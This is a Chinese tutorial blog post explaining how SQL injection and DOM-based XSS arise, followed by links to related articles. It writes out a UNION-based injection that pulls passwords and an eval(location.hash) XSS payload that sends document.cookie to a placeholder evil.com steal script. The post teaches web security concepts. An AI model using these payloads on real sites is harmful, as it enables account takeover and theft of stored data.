web前端黑客技术之数据与指令【sql注入、xss跨站脚本攻击】

最新推荐文章于 2021-07-02 14:53:51 发布
最新推荐文章于 2021-07-02 14:53:51 发布
阅读量1.2k 收藏
点赞数
分类专栏: 前端黑客技术学习篇 文章标签: sql注入 黑客 Xss跨站攻击 cookies
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xpf_show/article/details/38426537
版权

首先,我们知道,用浏览器打开一个网站,呈现在我们面前的都是数据,服务器端存储的(数据库,内存,文件系统等)、客户端存储的(本地Cookies,flash Cookies等),传输中的(json数据,和xml数据等,)还有文本数据等等。

而在这些数据的交换过程中,如果出现数据流被污染了,就会出现非预期的出存储和传输,导致安全风险。


而存储,传输并呈现这些数据的时候,需要执行指令,指令简单的说就是要执行的命令行。而不同的指令的解释执行则由对应的环境完成,如:

select username,email,descl from users where id=1

这条mySql指令在数据库引擎环境中被解释,然后产生查询对于的数据。


当正常的数据内容被注入指令内容,在解释的过程中,如果注入指令能够被独立执行,那么攻击就发生了 

【1】SQL注入攻击的发生

select username,email,desc1 from users where id=1;
正如我们所看到的,这条sql语句中id的值是来自用户提交,并且用户通过访问链接来获取自身的帐号信息。当用户访问这样的连接时,后端便触发执行上面的查询语句,并返回对应的id号的用户数据给前端显示。一般情况下,铍铜的用户对id提交整形数值,而邪恶的攻击者会提交如下列形式的值 

1 union select password,1,1 from users
组成的链接形式:

http://www.foo.com/user.php?id=1 union select password,1,1 from users

组成的SQL语句为:

select username,email,desc1 from users whrere id=1 union select password,1,1 from users

XSS跨站脚本攻击的发生 

<script>
eval(location.hash.substr(1));
</script>

这里eval内置函数可以动态执行js语句,而location.hash()获取的是链接及URL中#及其后面的内容,如 ````.foo.com/info.html#callback。获取的十九#callback,而substr是用于截取字符,也就是#好后面内容。

而在这里,我们可以构建一个这样的攻击:

http://www.foo.com/info.html#new%20Image().src="http://www.evil.com/stea.1.php?c="+escape(document.cookie)

而在浏览器解析 
eval(location.hash.substr(1));
则会变为 

eval('new Image().src="http://www.evil.com/steal.php?c="+escape(document.cookie)')

而当被攻击者被诱骗访问了该连接时,cookies会话信息就会被盗取到黑客的网站上,一般情况下,黑客利用该cookies可以登录被攻击者的帐号,并进行越权操作。



【补充】

跨站攻击是发生在浏览器客户端,而SQL注入由于针对的对象是数据库,一般情况下,数据库都在服务端,而HTML5提供了一个i额客户端存储几只,在浏览器段,使用SQLite数据库保存客户端数据,该几只允许使用js脚本操作SQL语句,从而本地化数据库进行交互 



壹间show
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
常见的Web攻击方式:SQL注入XSS跨站脚本攻击、CSRF跨站点请求伪造
学习
07-07 6770
常见的Web攻击SQL注入XSS跨站脚本攻击跨站点请求伪造共三类,下面分别简单介绍。 1 SQL注入 1.1 原理        SQL注入就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。SQL注入漏洞到底是以怎样的形式进行攻击的呢,接下来将以一个简单的实例来进行介绍。   &...
XSS基础
qq_57157540的博客
04-25 3183
a.XSSSQL注入攻击中的攻击指令都是由黑客通过用户输入域注入,只不过XSS注入的是HTML代码(以后称脚本),而SQL注入注入的是SQL命令。 b.XSSSQL注入攻击都利用了Web服务器没有对用户输入数据进行严格的检查和有效过滤的缺陷 。 c.SQL注入的SQL命令在用户浏览器中执行,而XSS跨站的脚本在Web后台数据库中执行。 d.XSS攻击盗取Web终端用户的敏感数据,甚至控制用户终端操作;SQL注入攻击盗取Web后台数据库中的敏感数据,甚至控制整个数据库服务器
Xss跨域访问漏洞过滤器
11-01
门户网站解决Xss跨域访问漏洞,一个拦截器,拦截在你的网站里恶意添加广告等信息
第21题:前端常见的攻击方法:XSS、CSRF、SQL注入
小柒的前端之旅
10-09 1008
题目: 前端常见的攻击方法包括:ABC A: XSS B: CSRF C: SQL注入 D: ARP攻击 解析 什么是XSS跨站脚本攻击(Cross Site Scripting),为了不使其与层叠样式表的缩写混淆,故跨站脚本攻击的缩写为XSS。恶意攻击者往Web页面里插入Script代码,当用户浏览该页面时,嵌入其中的Web里面的脚本代码会被执行。从而达到攻击用户的目的。(比如获取用户的Co...
web跨站脚本攻击XSS)与sql注入攻击 实例
a116385895的博客
07-02 3050
免责申明:对于此内容仅是提供参考,用于开发人员针对黑客攻击做好安全防范 XSS攻击跨站脚本在英文中称为Cross-Site Scripting,缩写为CSS。但是,由于层叠样式表 (Cascading Style Sheets)的缩写也为CSS,为不与其混淆,特将跨站脚本缩写为XSS跨站脚本,顾名思义,就是恶意攻击者利用网站漏洞往Web页面里插入恶意代码,一般需要以下几个条件: 客户端访问的网站是一个有漏洞的网站,但是他没有意识到; 在这个网站中通过一些手段放入一段可以执行的代码,吸引客户
XSS跨站脚本攻击剖析与防御
04-28
XSS跨站脚本攻击剖析与防御是一本专门剖析XSS安全的专业书,总共8章,主要包括的内容如下。第1章 XSS初探,主要阐述了XSS的基础知识,包括XSS攻击原理和危害。第2章 XSS利用方式,就当前比较流行的XSS利用方式做了...
预防XSS攻击SQL注入XssFilter
05-19
对于跨站脚本攻击黑客界共识是:跨站脚本攻击是新型的“缓冲区溢出攻击“,而JavaScript是新型的“ShellCode”。 二、XSS漏洞的危害 (1)网络钓鱼,包括盗取各类用户账号; (2)窃取用户cookies资料,从而获取...
XSS跨站脚本攻击
01-27
跨站脚本(crosssitescript)为了避免与样式css混淆,所以简称为XSSXSS是一种经常出现在web应用中的计算机安全漏洞,也是web中最主流的攻击方式。那么什么是XSS呢?XSS是指恶意攻击者利用网站没有对用户提交数据...
解析如何防止XSS跨站脚本攻击
01-31
这些规则适用于所有不同类别的XSS跨站脚本攻击,可以通过在服务端执行适当的解码来定位映射的XSS以及存储的XSS,由于XSS也存在很多特殊情况,因此强烈推荐使用解码库。另外,基于XSS的DOM也可以通过将这些规则运用在...
xss跨站脚本攻击-运维安全详细笔记
最新发布
06-30
xss跨站脚本攻击-运维安全详细笔记
java防止xss脚本注入攻击,采用spring工具类方式
11-29 2727
StringEscapeUtils.escapeHtml(value); StringEscapeUtils.escapeJavaScript(value); StringEscapeUtils.escapeSql(value);
配置过滤器filter对跨站脚本攻击XSS实现拦截
Welcom to zougangx's blog
11-21 7601
1.web.xml中配置filter [html] view plain copy filter>       filter-name>XssFilterfilter-name>       filter-class>com.wk.util.XssFilterfilter-class>   filter>   filter-mapping
java架构学习——17. 表单重复提交&防止模拟请求&跨域解决方案&XSS攻击
wmq_fly的博客
02-15 719
一、http长连接与短连接 在HTTP/1.0中,默认使用的是短连接。也就是说,浏览器和服务器每进行一次HTTP操作,就建立一次连接,但任务结束就中断连接。如果客户端浏览器访问的某个HTML或其他类型的 Web页中包含有其他的Web资源,如JavaScript文件、图像文件、CSS文件等;当浏览器每遇到这样一个Web资源,就会建立一个HTTP会话。 但从 HTTP/1.1起,默认使用长连接,用以保...
防止XSS跨站脚本攻击:Java过滤器
热门推荐
琦彦
01-25 2万+
XSS问题描述 跨站脚本(Cross site script,简称xss)是一种“HTML注入”,由于攻击的脚本多数时候是跨域的,所以称之为“跨域脚本”。 我们常常听到“注入”(Injection),如SQL注入,那么到底“注入”是什么?注入本质上就是把输入的数据变成可执行的程序语句。SQL注入是如此,XSS也如此,只不过XSS一般注入的是恶意的脚本代码,这些脚本代码可以用来获取合法用户的数...
js跨域脚本攻击java解决方案
rocgege的专栏
01-12 1777
StringEscapeUtils.escapeHtml4(ResourcePropUtil.valueOf(aprove.getfName(), ""))
web过滤器中获取请求的参数(content-type:multipart/form-data)
weixin_30297281的博客
12-21 568
1.前言:   1.1 在使用springMVC中,需要在过滤器中获取请求中的参数token,根据token判断请求是否合法;   1.2通过requst.getParameter(key)方法获得参数值;     这种方法有缺陷:它只能获取 POST 提交方式中的Content-Type: application/x-www-form-urlencoded;    Ht...
跨站脚本攻击XSS)几种解决方案浅析
零度的博客专栏
08-04 1万+
一、概述        Cross-site scripting(CSS or XSS)跨站脚本不像其他攻击只包含两个部分:攻击者和web站点,跨站脚本包含三个部分:攻击者,客户和web站点。跨站脚本攻击的目的是窃取客户的cookies,或者其他可以证明用户身份的敏感信息。   二、XSS攻击原理 一个get请求: GET /welcome.cgi?name=Joe%20Hacker
Web前端--黑客技术揭秘(菜鸟知识)
ljiechang的专栏
06-03 7114
一,Web安全的关键点 1.同源策略是众多安全策略的一个,是Web层面上的策略,非常重要。 2.同源策略规定:不同域的客户端脚本在没明确授权的情况下,不能读写对方的资源。 3.同域要求两个站点同协议,同域名,同端口。 4.当然,在同一个域内,客户端脚本可以任意读写同源内的资源,前提是这个资源本身是可读可写的。 5.安全类似木桶原理,短的那块板决定了木桶实际能装多少水。一个Web服务器,r
SQL 注入、XSS 攻击、CSRF 攻击
weixin_33910434的博客
09-22 1173
SQL 注入、XSS 攻击、CSRF 攻击 SQL 注入 什么是 SQL 注入 SQL 注入,顾名思义就是通过注入 SQL 命令来进行攻击,更确切地说攻击者把 SQL 命令插入到 web 表单或请求参数的查询字符串里面提交给服务器,从而让服务器执行编写的恶意的 SQL 命令。 对于 web 开发者来说,SQL 注入已然是非常熟悉的,而且 SQL 注入已经生存了 10 多...
跨站脚本攻击XSS)与SQL注入攻击的异同
06-13
跨站脚本攻击XSS)和SQL注入攻击是两种常见的Web安全漏洞,它们都是利用了应用程序的漏洞来进行攻击。它们的异同如下: 相同点: 1. 都是Web应用程序常见的安全漏洞。 2. 都可以导致应用程序崩溃、数据泄露、被篡改或被盗取等危害。 3. 都可以通过输入恶意数据来进行攻击,如输入带有脚本或SQL语句的数据。 不同点: 1. XSS攻击是一种前端攻击攻击者通过注入恶意脚本来实现攻击,而SQL注入则是一种后端攻击攻击者通过注入恶意SQL语句来实现攻击。 2. XSS攻击主要利用了浏览器对页面脚本的信任来进行攻击,而SQL注入则是利用应用程序对用户输入数据的信任来进行攻击。 3. XSS攻击主要针对客户端,而SQL注入则主要针对服务器端。 4. XSS攻击可以通过一些简单的防御措施来避免,如对用户输入数据进行过滤和编码,而SQL注入攻击则需要对应用程序进行更加复杂的防御,如使用参数化查询等技术。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值